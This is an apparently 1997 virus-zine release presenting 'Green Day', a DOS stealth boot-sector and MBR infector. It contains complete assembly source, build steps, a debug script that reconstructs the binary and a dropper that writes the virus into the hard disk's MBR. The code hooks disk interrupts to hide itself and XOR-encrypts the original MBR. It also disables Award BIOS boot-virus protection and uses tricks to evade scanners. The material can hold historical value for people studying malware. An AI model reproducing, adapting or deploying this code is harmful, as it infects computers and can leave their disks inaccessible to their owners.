Copy Link
Add to Bookmark
Report
SLAM4.047: Green Day by Virtual Daemon/SLAM
Green Day
coded by Virtual Daemon/SLAM
- full stealth MBR/BS infector
- encrypts the original MBR/BS (lame XOR)
- read stealth on BS (floppy), read+write stealth on MBR (hard disk)
- saves the original MBR at 0,0,4 and the original BS at 0,1,14
- disables the boot sector virus protection on computers with Award BIOS
- infected floppy disks will work properly on uninfected systems too
- an infected HDD is inaccessible when booted from a clean floppy disk
- contains retro code in order to bypass scanners
- lame payload in order to fill up some bytes left ;]
Blah, here it is... I kept this one too long in the darkness...It was build as a contribution for SLAM #3, but it was too buggy back then too release.
Well, I rewritten some parts of the code, and now here it is. It's not much, but it could be a start for someone that is willing to learn.
Compile it with:
- tasm /m greenday.asm (3.2)
- tlink /x greenday.obj (5.1) or with debug < greenday.scr
- exe2bin greenday.exe (?.?? ;)
In both cases you should now lay your hands on a nice file: GREENDAY.BIN.
Use the dropper located at the end of this file to install the virus on your computer.The dropper will put the virus in 0,0,1 on your hard disk and it will automatically save (and encrypt) the original MBR at 0,0,4.If you just want to install the virus on a floppy disk then modify the dropper and put the original boot sector at 0,1,14 and the virus (GREENDAY.BIN) at 0,0,1.
I would like to say hi to all the guys from Undernet #vir, to all my friends from SLAM, and to all the others who know me. Love ya all!
Special thanks to CyberYoda who "convinced" me to "improve" this sucker. :)
%out
%out Green Day, Copyright (c) 1997 by Virtual Daemon [SLAM]
%out
.286
.model tiny
.code
org 0
jumps
begin:
jmp short vir_start ;jump to viral body
floppy_boot db 3ch dup (0) ;floppy stuph
vir_start:
xor ax,ax
mov ds,ax ;DS=AX=0
mov si,7c00h ;SI=7c00h
cli ;clear interrupts
mov ss,ax
mov sp,si ;SS:SP=0:7c00h
sti ;enable interrupts
mov di,56h ;'V'
add di,44h ;'D'
add di,379h ;di=413h
dec word ptr ds:[di] ;subtract 1 Kb of memory
mov ax,word ptr ds:[di] ;get usable memory size
mov cl,6
shl ax,cl ;get the new segment for our virus
push ax
mov es,ax ;and put it in ES
mov ax,256
push ax
pop cx ;how many bytes to copy
xor di,di
cld ;this is the most important part! =)
rep movsw ;DS:SI -> ES:DI = 0:7c00h -> ES:0
lea ax,[continue]
push ax
retf ;jump to our virus in memory
continue:
push es 0f000h
pop es ;ES will point to the "system monitor ROM" :)
xor di,di ;begin from offset 0
mov cx,0ffffh ;CX=maxWord :)
search:
pusha
lea si,awbios ;search for the AWARD string through it
mov cx,5
repe cmpsb
popa
je found_award ;this computer has an AWARD BIOS
inc di
loop search
jmp short no_award ;no pain no gain... :P
found_award:
mov dx,70h
mov al,3ch ;point to the Boot Configuration Bits
out dx,al
mov dx,71h
in al,dx
or al,128 ;disable the boot virus protection shit
out dx,al
no_award:
pop es
mov si,13h*4 ;get original int 13h entrypoint
lea di,old_13h ;and save it in our "old_13h" variable
cld
movsw
movsw
mov word ptr [si-2],es ;set our int 13h handler
mov word ptr [si-4],offset myint13h
mov ah,4 ;get date from CMOS
int 1ah
cmp dx,0904h ;check if 4th of septemeber
jne nopayload
mov ah,6 ;clear the screen
xor cx,cx
mov dh,25
mov dl,80
xor al,al
xor bh,bh
int 10h
mov ah,13h ;display a string
push cs
pop es
lea bp,message
mov cx,42 ;length of string
mov dh,13 ;row to start writting
mov dl,18 ;column
mov bl,14 ;atribute
int 10h
xor si,si
chpalete:
mov bx,si ;bx=color register to set
mul si
mov dh,al ;Red value
mov cl,al ;Blue value
add al,63
mov ch,al ;Green value
mov ax,1010h ;set new palete
int 10h
inc si
cmp si,64
jl chpalete
nopayload:
int 19h ;reboot with virus in memory
message db 'Green Day: take a minute to think about it' ;lame msg to write
readstealth:
call infection_check ;check if infected
jne infect ;no? go and infect it
call choose_sectors ;select the sectors for floppy/hard drive
rs_retry:
call readsector ;read the original sector instead of our virus
jc rs_retry ;keep trying...
call crypt ;decrypt it
jmp return
exit_handler:
db 0eah ;jump to the original entrypoint of Int 13h
old_13h dd ?
_ax dw 0
myint13h:
cmp dh,0 ;check if head 0
jne exit_handler
cmp cx,1 ;check if sector 1 and track 0
jne exit_handler
mov word ptr cs:[_ax],ax
call int13 ;emulate an int 13h
pushf
xchg word ptr cs:[_ax],ax ;ax=oldvalue, _ax=new value
jc return
cmp ah,2 ;read from sector 1 ?
je readstealth
cmp dl,80h ;don't stealth writes on floppies
jb return
cmp ah,3 ;write to sector 1 ?
je infect
return:
xchg ax,word ptr cs:[_ax] ;ax=new_value, _ax=oldvalue
popf
retf 2
infect:
pusha
push ds es
push cs cs
pop ds es ;DS=ES=CS
call infection_check ;load the original boot sector in memory
mov cx,3ch
mov si,514 ;save the boot shit so the infected floppy
lea di,floppy_boot ;will work on uninfected computers
cld
rep movsb ;move from DS:SI in ES:DI
call choose_sectors ;select the sectors for floppy/hard drive
mov bx,512 ;from CS:512
call crypt ;encrypt it
call writesector ;write the original MBR/BS
xor bx,bx
mov dh,0 ;to head 0
mov cx,1 ;track 0, sector 1
call writesector ;write our virus
pop es ds
popa
jmp return
awbios db 'AWARD'
choose_sectors:
mov cx,4 ;original MBR in sector 4
cmp dl,79h ;check if hard drive
ja cs_exit
mov dh,1 ;original BS in head 1, sector 14
mov cx,14
cs_exit:
ret
writesector:
mov ax,301h ;write one sector
jmp short int13
readsector:
mov ax,201h ;read one sector
int13:
pushf ;push flags on stack
call dword ptr cs:[old_13h] ;jump to original entrypoint of int 13h
ret
infection_check:
pusha
push es
ic_retry:
push cs
pop es ;make ES=CS
mov bx,512 ;put it in CS:512
call readsector ;read it
jc ic_retry ;if error, retry
cmp word ptr es:[bx+offset mark],'rG' ;check to see if we're in
pop es
popa
ret
crypt:
pusha
mov cx,512 ;512 bytes=size of 1 sector
crypt_loop: ;let's XOR the motherfucker
xor byte ptr es:[bx],75 ;key=75=('S'+'L'+'A'+'M' div 4 ;)
inc bx ;next byte please
loop crypt_loop
popa
ret
mark db 'Green Day coded by Virtual Daemon/SLAM'
bootabledisk db 055h,0aah
end begin
; end of GREEN DAY virus
; -------------------------------- cut here ---------------------------------
Here goes the debug script I promised. So, for those of you who are still working with debug, i have only one thing to tell you: GO THA FUCK NOW AND BUY TURBO ASSEMBLER!!! You wont get far without it.
Paste the following lines into a file called GREENDAY.SCR and then use:
debug < greenday.scr
N GREENDAY.BIN
E 0100 EB 3C 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 0110 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 0120 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 0130 00 00 00 00 00 00 00 00 00 00 00 00 00 00 33 C0
E 0140 8E D8 BE 00 7C FA 8E D0 8B E6 FB BF 56 00 83 C7
E 0150 44 81 C7 79 03 FF 0D 8B 05 B1 06 D3 E0 50 8E C0
E 0160 B8 00 01 50 59 33 FF FC F3 A5 B8 6F 00 50 CB 06
E 0170 68 00 F0 07 33 FF B9 FF FF 60 BE 93 01 B9 05 00
E 0180 F3 A6 61 74 05 47 E2 F1 EB 0D BA 70 00 B0 3C EE
E 0190 BA 71 00 EC 0C 80 EE 07 BE 4C 00 BF 2B 01 FC A5
E 01A0 A5 8C 44 FE C7 44 FC 31 01 B4 04 CD 1A 81 FA 04
E 01B0 09 75 39 B4 06 33 C9 B6 19 B2 50 32 C0 32 FF CD
E 01C0 10 B4 13 0E 07 BD EE 00 B9 2A 00 B6 0D B2 12 B3
E 01D0 0E CD 10 33 F6 8B DE F7 E6 8A F0 8A C8 04 3F 8A
E 01E0 E8 B8 10 10 CD 10 46 83 FE 40 7C E9 CD 19 47 72
E 01F0 65 65 6E 20 44 61 79 3A 20 74 61 6B 65 20 61 20
E 0200 6D 69 6E 75 74 65 20 74 6F 20 74 68 69 6E 6B 20
E 0210 61 62 6F 75 74 20 69 74 E8 9A 00 75 45 E8 78 00
E 0220 E8 88 00 72 FB E8 A3 00 EB 2F EA 00 00 00 00 00
E 0230 00 80 FE 00 75 F4 83 F9 01 75 EF 2E A3 2F 01 E8
E 0240 6C 00 9C 2E 87 06 2F 01 72 0F 80 FC 02 74 C9 80
E 0250 FA 80 72 05 80 FC 03 74 09 2E 87 06 2F 01 9D CA
E 0260 02 00 60 1E 06 0E 0E 1F 07 E8 49 00 B9 3C 00 BE
E 0270 02 02 BF 02 00 FC F3 A4 E8 1D 00 BB 00 02 E8 4A
E 0280 00 E8 22 00 33 DB B6 00 B9 01 00 E8 18 00 07 1F
E 0290 61 EB C6 41 57 41 52 44 B9 04 00 80 FA 79 77 05
E 02A0 B6 01 B9 0E 00 C3 B8 01 03 EB 03 B8 01 02 9C 2E
E 02B0 FF 1E 2B 01 C3 60 06 0E 07 BB 00 02 E8 EC FF 72
E 02C0 F6 26 81 BF D8 01 47 72 07 61 C3 60 B9 00 02 26
E 02D0 80 37 4B 43 E2 F9 61 C3 47 72 65 65 6E 20 44 61
E 02E0 79 20 63 6F 64 65 64 20 62 79 20 56 69 72 74 75
E 02F0 61 6C 20 44 61 65 6D 6F 6E 2F 53 4C 41 4D 55 AA
RCX
0200
W
Q
; -------------------------------- cut here ---------------------------------
Here goes a little piece of code that will drop the Green Day virus on the first hard disk's MBR installed in your system. All you need is the GREENDAY.BIN file generated either by compiling the virus itself or by running debug on the script file.
Compile with TASM and TLINK. PS: If you just want to experiment with Green Day, I suggest you to backup your MBR. If not, then i guess you wont have any problems installing it (not that I encourage spreading or anything ;-))...
*** USE IT AT YOUR OWN RISK ***
˛
%out
%out Dropper for Green Day virus, Copyright (c) 1997 by Virtual Daemon [SLAM]
%out
.model tiny
.code
org 100h
start:
;read the original MBR in memory
mov ax,201h
mov dx,80h
mov cx,1
push cs
pop es
lea bx,after_end
int 13h
;encrypt the original MBR
mov cx,512
enc_loop:
xor byte ptr es:[bx],75
inc bx
loop enc_loop
;write the encrypted MBR to disk (0,0,4)
mov dx,80h
mov cx,4
mov ax,301h
lea bx,after_end
int 13h
;read the virus from file
mov ax,3d00h
lea dx,virus_sample
int 21h
xchg bx,ax
mov ah,3fh
lea dx,after_end
mov cx,512
int 21h
mov ah,3eh
int 21h
;write the virus to disk (0,0,1)
mov dx,80h
mov ax,301h
lea bx,after_end
mov cx,1
int 13h
;exit to operating system
mov ax,4c00h
int 21h
virus_sample db 'greenday.bin',0
after_end:
end start
; end of dropper program
